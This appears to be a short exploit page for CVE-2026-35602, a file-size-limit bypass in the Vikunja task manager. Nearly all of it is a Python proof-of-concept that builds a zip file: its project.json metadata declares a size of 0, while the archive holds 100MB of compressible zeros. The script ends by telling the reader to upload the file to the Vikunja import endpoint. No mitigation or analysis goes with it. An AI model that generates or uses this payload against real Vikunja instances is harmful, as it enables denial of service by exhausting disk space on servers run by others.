CVE-2026-35602 Vikunja文件大小限制绕过漏洞

import zipfile import os # Create a malicious zip file to bypass size check zip_filename = "malicious_vikunja_import.zip" large_file_size = 100 * 1024 * 1024 # Target 100MB uncompressed size with zipfile.ZipFile(zip_filename, 'w', zipfile.ZIP_DEFLATED) as zf: # 1. Create project.json metadata with Size set to 0 # This bypasses the server-side size enforcement check metadata = '{"files": [{"file": "data.bin", "size": 0}]}' zf.writestr("project.json", metadata) # 2. Add a large file that compresses well (e.g., all zeros) # When decompressed on the server, this will consume 100MB of disk space # despite the metadata claiming size 0. # Creating a buffer of zeros for high compression ratio zero_buffer = bytes(large_file_size) zf.writestr("data.bin", zero_buffer) print(f"Generated {zip_filename}. Upload this to the Vikunja import endpoint.")